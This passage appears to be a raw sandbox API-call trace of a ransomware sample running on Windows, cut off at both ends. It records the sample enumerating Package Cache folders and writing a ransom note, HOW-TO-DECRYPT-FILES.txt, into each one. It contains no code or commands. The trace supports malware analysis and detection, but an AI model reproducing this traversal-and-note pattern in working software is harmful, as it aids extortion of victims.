lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0048.060] GetLastError () returned 0x12 [0048.060] FindNextFileW (in: hFindFile=0x360b60, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 0 [0048.060] GetLastError () returned 0x12 [0048.060] FindClose (in: hFindFile=0x360b60 | out: hFindFile=0x360b60) returned 1 [0048.060] SetErrorMode (uMode=0x0) returned 0x1 [0048.060] FindFirstFileW (in: lpFileName="C:\\Users\\All Users\\Package Cache\\D4036846864773E3D647F421DFE7F6CA536E307B\\packages\\Patch\\x86\\*", lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 0x360b60 [0048.060] GetLastError () returned 0x12 [0048.060] FindNextFileW (in: hFindFile=0x360b60, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0048.060] GetLastError () returned 0x12 [0048.061] FindNextFileW (in: hFindFile=0x360b60, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0048.061] GetLastError () returned 0x12 [0048.061] FindNextFileW (in: hFindFile=0x360b60, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 0 [0048.061] GetLastError () returned 0x12 [0048.061] FindClose (in: hFindFile=0x360b60 | out: hFindFile=0x360b60) returned 1 [0048.061] SetErrorMode (uMode=0x0) returned 0x1 [0048.061] FindFirstFileW (in: lpFileName="C:\\Users\\All Users\\Package Cache\\D4036846864773E3D647F421DFE7F6CA536E307B\\packages\\Patch\\x86\\*", lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 0x360b60 [0048.061] GetLastError () returned 0x12 [0048.061] FindNextFileW (in: hFindFile=0x360b60, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0048.061] GetLastError () returned 0x12 [0048.061] FindNextFileW (in: hFindFile=0x360b60, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0048.061] GetLastError () returned 0x12 [0048.061] FindNextFileW (in: hFindFile=0x360b60, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 0 [0048.061] GetLastError () returned 0x12 [0048.061] FindClose (in: hFindFile=0x360b60 | out: hFindFile=0x360b60) returned 1 [0048.061] SetErrorMode (uMode=0x0) returned 0x1 [0048.061] GetFileAttributesExW (in: lpFileName="C:\\Users\\All Users\\Package Cache\\D4036846864773E3D647F421DFE7F6CA536E307B\\packages\\Patch\\x86\\Windows6.1-KB2999226-x86.msu" (normalized: "c:\\users\\all users\\package cache\\d4036846864773e3d647f421dfe7f6ca536e307b\\packages\\patch\\x86\\windows6.1-kb2999226-x86.msu"), fInfoLevelId=0x0, lpFileInformation=0x1cb0e7c | out: lpFileInformation=0x1cb0e7c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9ad20100, ftCreationTime.dwHighDateTime=0x1d0a164, ftLastAccessTime.dwLowDateTime=0x9ad20100, ftLastAccessTime.dwHighDateTime=0x1d0a164, ftLastWriteTime.dwLowDateTime=0x9ad20100, ftLastWriteTime.dwHighDateTime=0x1d0a164, nFileSizeHigh=0x0, nFileSizeLow=0x98303)) returned 1 [0048.062] GetLastError () returned 0x12 [0048.062] SetErrorMode (uMode=0x0) returned 0x1 [0048.062] CreateFileW (lpFileName="C:\\Users\\All Users\\Package Cache\\D4036846864773E3D647F421DFE7F6CA536E307B\\packages\\Patch\\x86\\HOW-TO-DECRYPT-FILES.txt" (normalized: "c:\\users\\all users\\package cache\\d4036846864773e3d647f421dfe7f6ca536e307b\\packages\\patch\\x86\\how-to-decrypt-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x184 [0048.063] GetLastError () returned 0x0 [0048.063] GetFileType (hFile=0x184) returned 0x1 [0048.063] GetFileType (hFile=0x184) returned 0x1 [0048.063] CloseHandle (hObject=0x184) returned 1 [0048.064] GetLastError () returned 0x0 [0048.064] SetFileAttributesW (lpFileName="C:\\Users\\All Users\\Package Cache\\D4036846864773E3D647F421DFE7F6CA536E307B\\packages\\Patch\\x86\\HOW-TO-DECRYPT-FILES.txt", dwFileAttributes=0x1) returned 1 [0048.064] GetLastError () returned 0x0 [0048.064] FindFirstFileW (in: lpFileName="C:\\Users\\All Users\\Package Cache\\{13A4EE12-23EA-3371-91EE-EFB36DDFFF3E}v12.0.21005\\*", lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 0x360b60 [0048.068] GetLastError () returned 0x0 [0048.068] FindNextFileW (in: hFindFile=0x360b60, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0048.068] GetLastError () returned 0x0 [0048.068] FindNextFileW (in: hFindFile=0x360b60, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0048.068] GetLastError () returned 0x0 [0048.068] FindNextFileW (in: hFindFile=0x360b60, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 0 [0048.068] GetLastError () returned 0x12 [0048.068] FindClose (in: hFindFile=0x360b60 | out: hFindFile=0x360b60) returned 1 [0048.068] SetErrorMode (uMode=0x0) returned 0x1 [0048.068] FindFirstFileW (in: lpFileName="C:\\Users\\All Users\\Package Cache\\{13A4EE12-23EA-3371-91EE-EFB36DDFFF3E}v12.0.21005\\*", lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 0x360b60 [0048.069] GetLastError () returned 0x12 [0048.069] FindNextFileW (in: hFindFile=0x360b60, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0048.069] GetLastError () returned 0x12 [0048.069] FindNextFileW (in: hFindFile=0x360b60, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0048.069] GetLastError () returned 0x12 [0048.069] FindNextFileW (in: hFindFile=0x360b60, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 0 [0048.069] GetLastError () returned 0x12 [0048.069] FindClose (in: hFindFile=0x360b60 | out: hFindFile=0x360b60) returned 1 [0048.069] SetErrorMode (uMode=0x0) returned 0x1 [0048.069] FindFirstFileW (in: lpFileName="C:\\Users\\All Users\\Package Cache\\{13A4EE12-23EA-3371-91EE-EFB36DDFFF3E}v12.0.21005\\packages\\*", lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 0x360b60 [0048.069] GetLastError () returned 0x12 [0048.069] FindNextFileW (in: hFindFile=0x360b60, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0048.069] GetLastError () returned 0x12 [0048.069] FindNextFileW (in: hFindFile=0x360b60, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0048.069] GetLastError () returned 0x12 [0048.069] FindNextFileW (in: hFindFile=0x360b60, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 0 [0048.069] GetLastError () returned 0x12 [0048.069] FindClose (in: hFindFile=0x360b60 | out: hFindFile=0x360b60) returned 1 [0048.069] SetErrorMode (uMode=0x0) returned 0x1 [0048.069] FindFirstFileW (in: lpFileName="C:\\Users\\All Users\\Package Cache\\{13A4EE12-23EA-3371-91EE-EFB36DDFFF3E}v12.0.21005\\packages\\*", lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 0x360b60 [0048.070] GetLastError () returned 0x12 [0048.070] FindNextFileW (in: hFindFile=0x360b60, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0048.070] GetLastError () returned 0x12 [0048.070] FindNextFileW (in: hFindFile=0x360b60, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0048.070] GetLastError () returned 0x12 [0048.070] FindNextFileW (in: hFindFile=0x360b60, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 0 [0048.070] GetLastError () returned 0x12 [0048.070] FindClose (in: hFindFile=0x360b60 | out: hFindFile=0x360b60) returned 1 [0048.070] SetErrorMode (uMode=0x0) returned 0x1 [0048.070] FindFirstFileW (in: lpFileName="C:\\Users\\All Users\\Package Cache\\{13A4EE12-23EA-3371-91EE-EFB36DDFFF3E}v12.0.21005\\packages\\vcRuntimeMinimum_x86\\*", lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 0x360b60 [0048.071] GetLastError () returned 0x12 [0048.071] FindNextFileW (in: hFindFile=0x360b60, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0048.071] GetLastError () returned 0x12 [0048.071] FindNextFileW (in: hFindFile=0x360b60, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0048.071] GetLastError () returned 0x12 [0048.071] FindNextFileW (in: hFindFile=0x360b60, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0048.071] GetLastError () returned 0x12 [0048.071] FindNextFileW (in: hFindFile=0x360b60, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 0 [0048.071] GetLastError () returned 0x12 [0048.071] FindClose (in: hFindFile=0x360b60 | out: hFindFile=0x360b60) returned 1 [0048.071] SetErrorMode (uMode=0x0) returned 0x1 [0048.071] FindFirstFileW (in: lpFileName="C:\\Users\\All Users\\Package Cache\\{13A4EE12-23EA-3371-91EE-EFB36DDFFF3E}v12.0.21005\\packages\\vcRuntimeMinimum_x86\\*", lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 0x360b60 [0048.071] GetLastError () returned 0x12 [0048.071] FindNextFileW (in: hFindFile=0x360b60, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0048.071] GetLastError () returned 0x12 [0048.071] FindNextFileW (in: hFindFile=0x360b60, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0048.071] GetLastError () returned 0x12 [0048.071] FindNextFileW (in: hFindFile=0x360b60, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0048.071] GetLastError () returned 0x12 [0048.071] FindNextFileW (in: hFindFile=0x360b60, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 0 [0048.071] GetLastError () returned 0x12 [0048.071] FindClose (in: hFindFile=0x360b60 | out: hFindFile=0x360b60) returned 1 [0048.071] SetErrorMode (uMode=0x0) returned 0x1 [0048.071] GetFileAttributesExW (in: lpFileName="C:\\Users\\All Users\\Package Cache\\{13A4EE12-23EA-3371-91EE-EFB36DDFFF3E}v12.0.21005\\packages\\vcRuntimeMinimum_x86\\cab1.cab" (normalized: "c:\\users\\all users\\package cache\\{13a4ee12-23ea-3371-91ee-efb36ddfff3e}v12.0.21005\\packages\\vcruntimeminimum_x86\\cab1.cab"), fInfoLevelId=0x0, lpFileInformation=0x1cd3ed8 | out: lpFileInformation=0x1cd3ed8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe6014500, ftCreationTime.dwHighDateTime=0x1cf3e37, ftLastAccessTime.dwLowDateTime=0xe6014500, ftLastAccessTime.dwHighDateTime=0x1cf3e37, ftLastWriteTime.dwLowDateTime=0xe6014500, ftLastWriteTime.dwHighDateTime=0x1cf3e37, nFileSizeHigh=0x0, nFileSizeLow=0xf36be)) returned 1 [0048.072] GetLastError () returned 0x12 [0048.072] SetErrorMode (uMode=0x0) returned 0x1 [0048.072] CreateFileW (lpFileName="C:\\Users\\All Users\\Package Cache\\{13A4EE12-23EA-3371-91EE-EFB36DDFFF3E}v12.0.21005\\packages\\vcRuntimeMinimum_x86\\HOW-TO-DECRYPT-FILES.txt" (normalized: "c:\\users\\all users\\package cache\\{13a4ee12-23ea-3371-91ee-efb36ddfff3e}v12.0.21005\\packages\\vcruntimeminimum_x86\\how-to-decrypt-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x184 [0048.074] GetLastError () returned 0x0 [0048.074] GetFileType (hFile=0x184) returned 0x1 [0048.074] GetFileType (hFile=0x184) returned 0x1 [0048.075] CloseHandle (hObject=0x184) returned 1 [0048.075] GetLastError () returned 0x0 [0048.075] SetFileAttributesW (lpFileName="C:\\Users\\All Users\\Package Cache\\{13A4EE12-23EA-3371-91EE-EFB36DDFFF3E}v12.0.21005\\packages\\vcRuntimeMinimum_x86\\HOW-TO-DECRYPT-FILES.txt", dwFileAttributes=0x1) returned 1 [0048.075] GetLastError () returned 0x0 [0048.075] GetFileAttributesExW (in: lpFileName="C:\\Users\\All Users\\Package Cache\\{13A4EE12-23EA-3371-91EE-EFB36DDFFF3E}v12.0.21005\\packages\\vcRuntimeMinimum_x86\\vc_runtimeMinimum_x86.msi" (normalized: "c:\\users\\all users\\package cache\\{13a4ee12-23ea-3371-91ee-efb36ddfff3e}v12.0.21005\\packages\\vcruntimeminimum_x86\\vc_runtimeminimum_x86.msi"), fInfoLevelId=0x0, lpFileInformation=0x1cf1b9c | out: lpFileInformation=0x1cf1b9c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe6014500, ftCreationTime.dwHighDateTime=0x1cf3e37, ftLastAccessTime.dwLowDateTime=0xe6014500, ftLastAccessTime.dwHighDateTime=0x1cf3e37, ftLastWriteTime.dwLowDateTime=0xe6014500, ftLastWriteTime.dwHighDateTime=0x1cf3e37, nFileSizeHigh=0x0, nFileSizeLow=0x23000)) returned 1 [0048.075] GetLastError () returned 0x0 [0048.075] SetErrorMode (uMode=0x0) returned 0x1 [0048.076] CreateFileW (lpFileName="C:\\Users\\All Users\\Package Cache\\{13A4EE12-23EA-3371-91EE-EFB36DDFFF3E}v12.0.21005\\packages\\vcRuntimeMinimum_x86\\HOW-TO-DECRYPT-FILES.txt" (normalized: "c:\\users\\all users\\package cache\\{13a4ee12-23ea-3371-91ee-efb36ddfff3e}v12.0.21005\\packages\\vcruntimeminimum_x86\\how-to-decrypt-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0xffffffff [0048.076] GetLastError () returned 0x5 [0048.077] SetErrorMode (uMode=0x0) returned 0x1 [0048.077] FindFirstFileW (in: lpFileName="C:\\Users\\All Users\\Package Cache\\{33d1fd90-4274-48a1-9bc1-97e33d9c2d6f}\\*", lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 0x360b60 [0048.077] GetLastError () returned 0x5 [0048.077] FindNextFileW (in: hFindFile=0x360b60, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0048.078] GetLastError () returned 0x5 [0048.078] FindNextFileW (in: hFindFile=0x360b60, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0048.078] GetLastError () returned 0x5 [0048.078] FindNextFileW (in: hFindFile=0x360b60, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0048.078] GetLastError () returned 0x5 [0048.078] FindNextFileW (in: hFindFile=0x360b60, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 0 [0048.078] GetLastError () returned 0x12 [0048.078] FindClose (in: hFindFile=0x360b60 | out: hFindFile=0x360b60) returned 1 [0048.078] SetErrorMode (uMode=0x0) returned 0x1 [0048.078] FindFirstFileW (in: lpFileName="C:\\Users\\All Users\\Package Cache\\{33d1fd90-4274-48a1-9bc1-97e33d9c2d6f}\\*", lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 0x360b60 [0048.078] GetLastError () returned 0x12 [0048.078] FindNextFileW (in: hFindFile=0x360b60, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0048.078] GetLastError () returned 0x12 [0048.078] FindNextFileW (in: hFindFile=0x360b60, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0048.078] GetLastError () returned 0x12 [0048.078] FindNextFileW (in: hFindFile=0x360b60, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0048.078] GetLastError () returned 0x12 [0048.078] FindNextFileW (in: hFindFile=0x360b60, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 0 [0048.078] GetLastError () returned 0x12 [0048.078] FindClose (in: hFindFile=0x360b60 | out: hFindFile=0x360b60) returned 1 [0048.078] SetErrorMode (uMode=0x0) returned 0x1 [0048.078] GetFileAttributesExW (in: lpFileName="C:\\Users\\All Users\\Package Cache\\{33d1fd90-4274-48a1-9bc1-97e33d9c2d6f}\\state.rsm" (normalized: "c:\\users\\all users\\package cache\\{33d1fd90-4274-48a1-9bc1-97e33d9c2d6f}\\state.rsm"), fInfoLevelId=0x0, lpFileInformation=0x1d11818 | out: lpFileInformation=0x1d11818*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6861acb0, ftCreationTime.dwHighDateTime=0x1d2da20, ftLastAccessTime.dwLowDateTime=0x6861acb0, ftLastAccessTime.dwHighDateTime=0x1d2da20, ftLastWriteTime.dwLowDateTime=0xcae8da20, ftLastWriteTime.dwHighDateTime=0x1d2f5a0, nFileSizeHigh=0x0, nFileSizeLow=0x272)) returned 1 [0048.079] GetLastError () returned 0x12 [0048.079] SetErrorMode (uMode=0x0) returned 0x1 [0048.079] CreateFileW (lpFileName="C:\\Users\\All Users\\Package Cache\\{33d1fd90-4274-48a1-9bc1-97e33d9c2d6f}\\HOW-TO-DECRYPT-FILES.txt" (normalized: "c:\\users\\all users\\package cache\\{33d1fd90-4274-48a1-9bc1-97e33d9c2d6f}\\how-to-decrypt-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x184 [0048.080] GetLastError () returned 0x0 [0048.081] GetFileType (hFile=0x184) returned 0x1 [0048.081] SetErrorMode (uMode=0x0) returned 0x1 [0048.081] GetFileType (hFile=0x184) returned 0x1 [0048.081] WriteFile (in: hFile=0x184, lpBuffer=0x1d2d668*, nNumberOfBytesToWrite=0x18da, lpNumberOfBytesWritten=0x18ed2c, lpOverlapped=0x0 | out: lpBuffer=0x1d2d668*, lpNumberOfBytesWritten=0x18ed2c*=0x18da, lpOverlapped=0x0) returned 1 [0048.082] GetLastError () returned 0x0 [0048.082] CloseHandle (hObject=0x184) returned 1 [0048.082] GetLastError () returned 0x0 [0048.082] SetFileAttributesW (lpFileName="C:\\Users\\All Users\\Package Cache\\{33d1fd90-4274-48a1-9bc1-97e33d9c2d6f}\\HOW-TO-DECRYPT-FILES.txt", dwFileAttributes=0x1) returned 1 [0048.082] GetLastError () returned 0x0 [0048.082] GetFileAttributesExW (in: lpFileName="C:\\Users\\All Users\\Package Cache\\{33d1fd90-4274-48a1-9bc1-97e33d9c2d6f}\\vcredist_x86.exe" (normalized: "c:\\users\\all users\\package cache\\{33d1fd90-4274-48a1-9bc1-97e33d9c2d6f}\\vcredist_x86.exe"), fInfoLevelId=0x0, lpFileInformation=0x1d2f39c | out: lpFileInformation=0x1d2f39c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6861acb0, ftCreationTime.dwHighDateTime=0x1d2da20, ftLastAccessTime.dwLowDateTime=0x6861acb0, ftLastAccessTime.dwHighDateTime=0x1d2da20, ftLastWriteTime.dwLowDateTime=0x4e71d7d0, ftLastWriteTime.dwHighDateTime=0x1d2da20, nFileSizeHigh=0x0, nFileSizeLow=0x6f428)) returned 1 [0048.082] GetLastError () returned 0x0 [0048.082] SetErrorMode (uMode=0x0) returned 0x1 [0048.084] CreateFileW (lpFileName="C:\\Users\\All Users\\Package Cache\\{33d1fd90-4274-48a1-9bc1-97e33d9c2d6f}\\HOW-TO-DECRYPT-FILES.txt" (normalized: "c:\\users\\all users\\package cache\\{33d1fd90-4274-48a1-9bc1-97e33d9c2d6f}\\how-to-decrypt-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0xffffffff [0048.084] GetLastError () returned 0x5 [0048.085] SetErrorMode (uMode=0x0) returned 0x1 [0048.085] FindFirstFileW (in: lpFileName="C:\\Users\\All Users\\Package Cache\\{582EA838-9199-3518-A05C-DB09462F68EC}v14.10.25017\\*", lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 0x360a20 [0048.086] GetLastError () returned 0x5 [0048.086] FindNextFileW (in: hFindFile=0x360a20, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0048.086] GetLastError () returned 0x5 [0048.086] FindNextFileW (in: hFindFile=0x360a20, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0048.086] GetLastError () returned 0x5 [0048.086] FindNextFileW (in: hFindFile=0x360a20, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 0 [0048.086] GetLastError () returned 0x12 [0048.086] FindClose (in: hFindFile=0x360a20 | out: hFindFile=0x360a20) returned 1 [0048.086] SetErrorMode (uMode=0x0) returned 0x1 [0048.086] FindFirstFileW (in: lpFileName="C:\\Users\\All Users\\Package Cache\\{582EA838-9199-3518-A05C-DB09462F68EC}v14.10.25017\\*", lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 0x360a20 [0048.086] GetLastError () returned 0x12 [0048.086] FindNextFileW (in: hFindFile=0x360a20, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0048.086] GetLastError () returned 0x12 [0048.086] FindNextFileW (in: hFindFile=0x360a20, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0048.086] GetLastError () returned 0x12 [0048.086] FindNextFileW (in: hFindFile=0x360a20, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 0 [0048.086] GetLastError () returned 0x12 [0048.086] FindClose (in: hFindFile=0x360a20 | out: hFindFile=0x360a20) returned 1 [0048.086] SetErrorMode (uMode=0x0) returned 0x1 [0048.086] FindFirstFileW (in: lpFileName="C:\\Users\\All Users\\Package Cache\\{582EA838-9199-3518-A05C-DB09462F68EC}v14.10.25017\\packages\\*", lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 0x360a20 [0048.087] GetLastError () returned 0x12 [0048.087] FindNextFileW (in: hFindFile=0x360a20, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0048.087] GetLastError () returned 0x12 [0048.087] FindNextFileW (in: hFindFile=0x360a20, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0048.087] GetLastError () returned 0x12 [0048.087] FindNextFileW (in: hFindFile=0x360a20, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 0 [0048.087] GetLastError () returned 0x12 [0048.087] FindClose (in: hFindFile=0x360a20 | out: hFindFile=0x360a20) returned 1 [0048.087] SetErrorMode (uMode=0x0) returned 0x1 [0048.087] FindFirstFileW (in: lpFileName="C:\\Users\\All Users\\Package Cache\\{582EA838-9199-3518-A05C-DB09462F68EC}v14.10.25017\\packages\\*", lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 0x360a20 [0048.087] GetLastError () returned 0x12 [0048.087] FindNextFileW (in: hFindFile=0x360a20, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0048.087] GetLastError () returned 0x12 [0048.087] FindNextFileW (in: hFindFile=0x360a20, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0048.087] GetLastError () returned 0x12 [0048.088] FindNextFileW (in: hFindFile=0x360a20, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 0 [0048.088] GetLastError () returned 0x12 [0048.088] FindClose (in: hFindFile=0x360a20 | out: hFindFile=0x360a20) returned 1 [0048.088] SetErrorMode (uMode=0x0) returned 0x1 [0048.088] FindFirstFileW (in: lpFileName="C:\\Users\\All Users\\Package Cache\\{582EA838-9199-3518-A05C-DB09462F68EC}v14.10.25017\\packages\\vcRuntimeMinimum_x86\\*", lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 0x360a20 [0048.088] GetLastError () returned 0x12 [0048.088] FindNextFileW (in: hFindFile=0x360a20, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0048.088] GetLastError () returned 0x12 [0048.088] FindNextFileW (in: hFindFile=0x360a20, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0048.088] GetLastError () returned 0x12 [0048.088] FindNextFileW (in: hFindFile=0x360a20, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0048.088] GetLastError () returned 0x12 [0048.088] FindNextFileW (in: hFindFile=0x360a20, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 0 [0048.088] GetLastError () returned 0x12 [0048.088] FindClose (in: hFindFile=0x360a20 | out: hFindFile=0x360a20) returned 1 [0048.088] SetErrorMode (uMode=0x0) returned 0x1 [0048.089] FindFirstFileW (in: lpFileName="C:\\Users\\All Users\\Package Cache\\{582EA838-9199-3518-A05C-DB09462F68EC}v14.10.25017\\packages\\vcRuntimeMinimum_x86\\*", lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 0x360a20 [0048.089] GetLastError () returned 0x12 [0048.089] FindNextFileW (in: hFindFile=0x360a20, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0048.089] GetLastError () returned 0x12 [0048.089] FindNextFileW (in: hFindFile=0x360a20, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0048.089] GetLastError () returned 0x12 [0048.089] FindNextFileW (in: hFindFile=0x360a20, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0048.089] GetLastError () returned 0x12 [0048.089] FindNextFileW (in: hFindFile=0x360a20, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 0 [0048.089] GetLastError () returned 0x12 [0048.089] FindClose (in: hFindFile=0x360a20 | out: hFindFile=0x360a20) returned 1 [0048.089] SetErrorMode (uMode=0x0) returned 0x1 [0048.089] GetFileAttributesExW (in: lpFileName="C:\\Users\\All Users\\Package Cache\\{582EA838-9199-3518-A05C-DB09462F68EC}v14.10.25017\\packages\\vcRuntimeMinimum_x86\\cab1.cab" (normalized: "c:\\users\\all users\\package cache\\{582ea838-9199-3518-a05c-db09462f68ec}v14.10.25017\\packages\\vcruntimeminimum_x86\\cab1.cab"), fInfoLevelId=0x0, lpFileInformation=0x1b56fa0 | out: lpFileInformation=0x1b56fa0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x66936b00, ftCreationTime.dwHighDateTime=0x1d28889, ftLastAccessTime.dwLowDateTime=0x66936b00, ftLastAccessTime.dwHighDateTime=0x1d28889, ftLastWriteTime.dwLowDateTime=0x66936b00, ftLastWriteTime.dwHighDateTime=0x1d28889, nFileSizeHigh=0x0, nFileSizeLow=0x13babb)) returned 1 [0048.089] GetLastError () returned 0x12 [0048.089] SetErrorMode (uMode=0x0) returned 0x1 [0048.090] CreateFileW (lpFileName="C:\\Users\\All Users\\Package Cache\\{582EA838-9199-3518-A05C-DB09462F68EC}v14.10.25017\\packages\\vcRuntimeMinimum_x86\\HOW-TO-DECRYPT-FILES.txt" (normalized: "c:\\users\\all users\\package cache\\{582ea838-9199-3518-a05c-db09462f68ec}v14.10.25017\\packages\\vcruntimeminimum_x86\\how-to-decrypt-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x184 [0048.091] GetLastError () returned 0x0 [0048.091] GetFileType (hFile=0x184) returned 0x1 [0048.091] SetErrorMode (uMode=0x0) returned 0x1 [0048.091] GetFileType (hFile=0x184) returned 0x1 [0048.091] WriteFile (in: hFile=0x184, lpBuffer=0x1b72b30*, nNumberOfBytesToWrite=0x18da, lpNumberOfBytesWritten=0x18ec54, lpOverlapped=0x0 | out: lpBuffer=0x1b72b30*, lpNumberOfBytesWritten=0x18ec54*=0x18da, lpOverlapped=0x0) returned 1 [0048.092] GetLastError () returned 0x0 [0048.092] CloseHandle (hObject=0x184) returned 1 [0048.092] GetLastError () returned 0x0 [0048.092] SetFileAttributesW (lpFileName="C:\\Users\\All Users\\Package Cache\\{582EA838-9199-3518-A05C-DB09462F68EC}v14.10.25017\\packages\\vcRuntimeMinimum_x86\\HOW-TO-DECRYPT-FILES.txt", dwFileAttributes=0x1) returned 1 [0048.093] GetLastError () returned 0x0 [0048.093] GetFileAttributesExW (in: lpFileName="C:\\Users\\All Users\\Package Cache\\{582EA838-9199-3518-A05C-DB09462F68EC}v14.10.25017\\packages\\vcRuntimeMinimum_x86\\vc_runtimeMinimum_x86.msi" (normalized: "c:\\users\\all users\\package cache\\{582ea838-9199-3518-a05c-db09462f68ec}v14.10.25017\\packages\\vcruntimeminimum_x86\\vc_runtimeminimum_x86.msi"), fInfoLevelId=0x0, lpFileInformation=0x1b7490c | out: lpFileInformation=0x1b7490c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x904c9200, ftCreationTime.dwHighDateTime=0x1d28889, ftLastAccessTime.dwLowDateTime=0x904c9200, ftLastAccessTime.dwHighDateTime=0x1d28889, ftLastWriteTime.dwLowDateTime=0x904c9200, ftLastWriteTime.dwHighDateTime=0x1d28889, nFileSizeHigh=0x0, nFileSizeLow=0x24000)) returned 1 [0048.093] GetLastError () returned 0x0 [0048.093] SetErrorMode (uMode=0x0) returned 0x1 [0048.093] CreateFileW (lpFileName="C:\\Users\\All Users\\Package Cache\\{582EA838-9199-3518-A05C-DB09462F68EC}v14.10.25017\\packages\\vcRuntimeMinimum_x86\\HOW-TO-DECRYPT-FILES.txt" (normalized: "c:\\users\\all users\\package cache\\{582ea838-9199-3518-a05c-db09462f68ec}v14.10.25017\\packages\\vcruntimeminimum_x86\\how-to-decrypt-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, 